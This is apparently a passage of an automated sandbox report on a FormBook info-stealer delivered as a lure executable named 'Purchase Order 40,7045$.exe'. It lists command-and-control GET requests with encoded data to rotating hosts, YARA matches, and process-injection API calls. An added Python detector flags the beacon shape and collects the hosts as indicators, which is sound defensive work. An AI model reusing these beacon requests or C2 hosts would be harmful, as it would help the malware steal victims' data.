Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1 | Host: www.the-gongs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.shopnicknaks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1 | Host: www.sweetbasilmarketing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1 | Host: www.justsoldbykristen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1 | Host: www.ariasu-nakanokaikei.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1 | Host: www.realitytvstockwatch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.searchnehomes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1 | Host: www.happinestbuilders.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.hemparcade.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: unknown | DNS traffic detected: queries for: www.handsfreedocs.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 20 Nov 2020 10:07:21 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://www.hemparcade.com
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://www.hemparcade.com/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://yuyabo.com/
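
Every beacon above has the same shape: a GET to one short directory (`/igqu/`), a query of one long base64-looking blob under a fixed key (`7nExDDz`) plus one short tag (`znedzJ=zZ08lr`), `Connection: close`, and no User-Agent header at all, which is what the "HTTP GET or POST without a user agent" signature keys on. The domains rotate (thirteen hosts in a single run, most of them unrelated sites that answer 403 or 404), so the request shape is a better detection handle than any one host. The following added example, not Joe Sandbox code, rebuilds four of the report's requests as raw HTTP, adds two constructed benign requests, and scores each one; the path and blob regexes and their length thresholds are assumptions fitted to this report, and other FormBook builds vary the format, so the rule is a starting point to be paired with the host list, not a replacement for it.

```python
"""Flag HTTP requests shaped like the FormBook beacons in this report and
collect their hosts as IOCs. Added example; not Joe Sandbox code.
"""
import re
from typing import Dict, List

PATH_RE = re.compile(r"^/[a-z0-9]{2,6}/$")            # one short directory, e.g. /igqu/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")    # long base64-looking value (assumed threshold)


def request(target: str, host: str, ua: str = "", connection: str = "close") -> str:
    """Build a raw HTTP/1.1 GET; no User-Agent header when `ua` is empty."""
    lines = [f"GET {target} HTTP/1.1", f"Host: {host}"]
    if ua:
        lines.append(f"User-Agent: {ua}")
    lines.append(f"Connection: {connection}")
    return "\r\n".join(lines) + "\r\n\r\n"


# First four: copied from the report. Last two: constructed benign traffic.
REQUESTS = [
    request("/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr", "www.maninhatphoto.com"),
    request("/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr", "www.placeduconfort.com"),
    request("/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr", "www.heartandcrowncloset.com"),
    request("/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr", "www.fahufu.com"),
    request("/index.html", "www.example.com", ua="Mozilla/5.0", connection="keep-alive"),
    request("/api/?q=c2FtcGxlLWJsb2ItZm9yLXRoZS1iZW5pZ24tY2FzZQ==&v=3", "www.example.net", ua="curl/7.68.0"),
]


def parse_request(raw: str):
    """Split a raw request into (method, target, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    first, *rest = head.split("\r\n")
    method, target, _version = first.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in rest:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw: str) -> Dict[str, object]:
    method, target, headers = parse_request(raw)
    path, _, query = target.partition("?")
    # Split by hand: urllib's parse_qsl would turn '+' inside the blob into a space.
    params = [kv.partition("=") for kv in query.split("&") if kv]
    indicators = {
        "no_user_agent": "user-agent" not in headers,
        "connection_close": headers.get("connection", "").lower() == "close",
        "short_dir_path": bool(PATH_RE.match(path)),
        "blob_plus_tag_query": (len(params) == 2
                                and bool(BLOB_RE.match(params[0][2]))
                                and 1 <= len(params[1][2]) <= 8),
    }
    # Structural shape alone is not enough (the benign /api/ request has it);
    # the missing User-Agent is what separates the beacon from a client library.
    hit = (method == "GET" and indicators["no_user_agent"]
           and indicators["short_dir_path"] and indicators["blob_plus_tag_query"])
    return {"host": headers.get("host", ""), "hit": hit, "indicators": indicators}


def beacon_hosts(requests: List[str]) -> List[str]:
    """Sorted, de-duplicated Host values of the requests that match."""
    return sorted({r["host"] for r in map(classify, requests) if r["hit"]})


if __name__ == "__main__":
    for raw in REQUESTS:
        r = classify(raw)
        print(r["host"], "BEACON" if r["hit"] else "ok", r["indicators"])
    print("IOC hosts:", beacon_hosts(REQUESTS))
```

On a proxy or Zeek `http.log` the same four fields (method, URI, User-Agent, Host) are already columns, so the rule ports directly; `connection_close` is recorded but not required, because it is common in benign traffic and only adds confidence.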

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order 40,7045$.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Purchase Order 40,7045$.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417BA0 NtCreateFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417C50 NtReadFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417CD0 NtClose,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417D80 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417C4C NtReadFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417CCA NtClose,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FCB040 NtSuspendThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A10 NtQuerySection,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FCA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9560 NtWriteFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FCAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17BA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CD0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C50 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CCA NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C4C NtReadFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9969
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E91F9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E8D64
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9D51
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9597
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E07F6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041C16E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00408A40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00408A3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041BF03
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B090
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041002
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105E824
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010520A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010528EC
